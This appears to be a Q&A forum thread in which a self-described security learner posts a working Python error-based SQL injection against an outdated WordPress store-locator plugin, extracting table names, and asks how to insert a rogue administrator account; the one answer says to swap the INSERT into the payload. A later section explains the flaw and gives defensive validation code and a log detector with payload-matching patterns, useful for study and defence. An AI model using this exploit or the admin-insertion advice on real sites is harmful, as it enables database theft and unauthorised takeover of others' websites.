Isaiah Y

Reputation: 99

Using Python for SQL Injection (WordPress)

As an aspiring network security expert, I have been practicing performing SQL injections on my WordPress installation.

Specifically, I have chosen this vulnerability found in an outdated plugin.

So far I have been able to successfully extract database information using the following code:

import re
import requests

url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php'

params = {
    "debug": "1",
    "mode": "gen",
    "sl_vars[num_initial_displayed]": "2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);"
}

r = requests.get(url, params=params)
# The plugin's debug output echoes the MySQL error; the value between the
# colons in the XPATH error message is the extracted table name.
# re.search is used so the match does not depend on the error text being
# at the very start of the response (re.match only matches at position 0).
m = re.search(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text)
print(m.group(1) if m else "no error message found in response")

Output: wp_users

My next experiment was to add an administrative account through this exploit, but I simply cannot seem to figure out how to query it correctly.

These are the necessary parameters:

INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', '[email protected]', '0');

Is an 'insert' action even possible through this kind of attack method?

Upvotes: 1

Views: 585
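The request in the question works because the plugin pastes the `sl_vars[num_initial_displayed]` value straight into a `LIMIT` clause and, with `debug=1`, echoes the raw MySQL error back to the client. The following is an added example (not code from the question, the plugin, or WordPress) showing, in Python, the two defender-side checks that matter here: strict validation of that parameter before it reaches SQL, and a detector that flags the same payload pattern in web server access logs. The log lines, the table name `sl_stores`, and the function names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A LIMIT argument is either "count" or "offset,count"; nothing else is allowed.
LIMIT_RE = re.compile(r"^\d{1,6}(?:,\d{1,6})?$")

# Tokens that appear in the error-based extraction payload shown on the page.
SUSPICIOUS_RE = re.compile(
    r"procedure\s+analyse|extractvalue\s*\(|information_schema", re.IGNORECASE
)

# Pulls the request target (path + query string) out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed sample access log: the first line carries the payload from the
# question (URL-encoded), the second is a benign request to the same endpoint.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /wp-content/plugins/store-locator/sl-xml.php'
    '?debug=1&mode=gen&sl_vars%5Bnum_initial_displayed%5D=2%2C1+procedure+analyse%28extractvalue'
    '%28rand%28%29%2Cconcat%280x3a%2C%28select+concat%280x3a%2Ctable_name%29+from+information_schema'
    '.tables+limit+90%2C1%29%29%29%2C1%29 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /wp-content/plugins/store-locator/sl-xml.php'
    '?mode=gen&sl_vars%5Bnum_initial_displayed%5D=2 HTTP/1.1" 200 2048',
]


def build_limit_clause_unsafe(raw_value: str) -> str:
    """The vulnerable pattern: the request parameter becomes part of the statement."""
    return "SELECT * FROM sl_stores LIMIT " + raw_value


def is_valid_limit(raw_value: str) -> bool:
    """True only for a bare integer or an 'offset,count' pair of integers."""
    return LIMIT_RE.fullmatch(raw_value) is not None


def build_limit_clause_safe(raw_value: str) -> str:
    """Hardened form: reject anything that is not purely numeric, then
    rebuild the clause from the parsed integers rather than the raw string."""
    if not is_valid_limit(raw_value):
        raise ValueError("num_initial_displayed must be an integer or offset,count")
    numbers = [int(part) for part in raw_value.split(",")]
    return "SELECT * FROM sl_stores LIMIT " + ",".join(str(n) for n in numbers)


def find_injection_attempts(log_lines):
    """Return (parameter name, decoded value) pairs whose value contains a
    token from the extraction payload, for each request in the log lines."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs decodes %XX sequences and turns '+' back into spaces,
        # so the check runs against the value the PHP script would have seen.
        for name, values in parse_qs(query).items():
            for value in values:
                if SUSPICIOUS_RE.search(value):
                    hits.append((name, value))
    return hits


if __name__ == "__main__":
    print(build_limit_clause_safe("2,1"))
    for name, value in find_injection_attempts(SAMPLE_LOG_LINES):
        print(f"flagged parameter {name!r}: {value[:60]}...")
```

The validation step is the real fix: once the parameter can only ever be digits, the `procedure analyse(...)` suffix has nowhere to go, and disabling the `debug` error echo removes the channel through which the error message carried data back. The log check is a coarse, after-the-fact signal; it catches this particular payload family but will miss encodings or keywords it does not list.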

Answers (1)

JCollerton

Reputation: 3307

In params replace select concat(0x3a,table_name) from information_schema.tables limit 90 with your INSERT query.

Upvotes: 1
